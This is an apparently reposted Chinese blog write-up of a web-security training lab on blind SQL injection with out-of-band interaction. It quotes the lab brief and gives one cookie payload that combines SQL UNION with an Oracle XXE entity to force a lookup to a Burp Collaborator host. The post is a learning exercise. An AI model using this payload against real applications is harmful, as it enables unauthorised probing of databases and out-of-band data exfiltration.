Lab: Blind SQL injection with out-of-band interaction:利用外带交互的盲注(半成品)
Posted Zeker62
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Lab: Blind SQL injection with out-of-band interaction:利用外带交互的盲注(半成品)相关的知识,希望对你有一定的参考价值。
靶场内容:
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.
The SQL query is executed asynchronously and has no effect on the application’s response. However, you can trigger out-of-band interactions with an external domain.
To solve the lab, exploit the SQL injection vulnerability to cause a DNS lookup to Burp Collaborator.
Learning path
note:
To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems.
To solve the lab, you must use Burp Collaborator’s default public server (burpcollaborator.net).
解决方法
- 这里直接使用xxe注入
server. For example, you can combine SQL injection with basic XXE techniques as follows: TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//xxxxxxxxxxxxxxxxxxxxxxxxxxx.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--.
比较复杂,建议读者百度一些教程观看
以上是关于Lab: Blind SQL injection with out-of-band interaction:利用外带交互的盲注(半成品)的主要内容,如果未能解决你的问题,请参考以下文章
Lab: Blind SQL injection with conditional errors带条件错误的盲注靶场复盘
Lab: Blind SQL injection with time delays and information retrieval:时间延迟盲注和信息检索两个靶场复盘
Lab: Blind SQL injection with out-of-band interaction:利用外带交互的盲注(半成品)